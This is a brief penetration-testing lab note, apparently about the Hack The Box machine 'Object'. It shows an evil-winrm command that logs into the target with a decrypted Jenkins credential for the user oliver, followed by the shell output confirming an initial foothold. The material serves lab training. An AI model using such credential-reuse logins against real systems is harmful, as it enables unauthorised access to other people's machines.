Object_WinRM

WinRM

---

Testing the [[Object_Decryption#[Go Decrypt Jenkins](https //github.com/thesubtlety/go-decrypt-jenkins)|credential]] of the oliver user after decrypting it

┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ evil-winrm -i $IP -u oliver -p 'c1cdfun_d2434'
                                        
Evil-WinRM shell v3.5
                                        
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\oliver\Documents> whoami
object\oliver
*evil-winrm* ps c:\Users\oliver\Documents> hostname
jenkins
*evil-winrm* ps c:\Users\oliver\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::20c
   ipv6 address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30
   link-local ipv6 address . . . . . : fe80::f00b:8831:17ef:6c30%12
   ipv4 address. . . . . . . . . . . : 10.10.11.132
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
                                       10.10.10.2

Password reuse confirmed for the oliver user Initial Foothold established to the target system as the oliver user via WinRM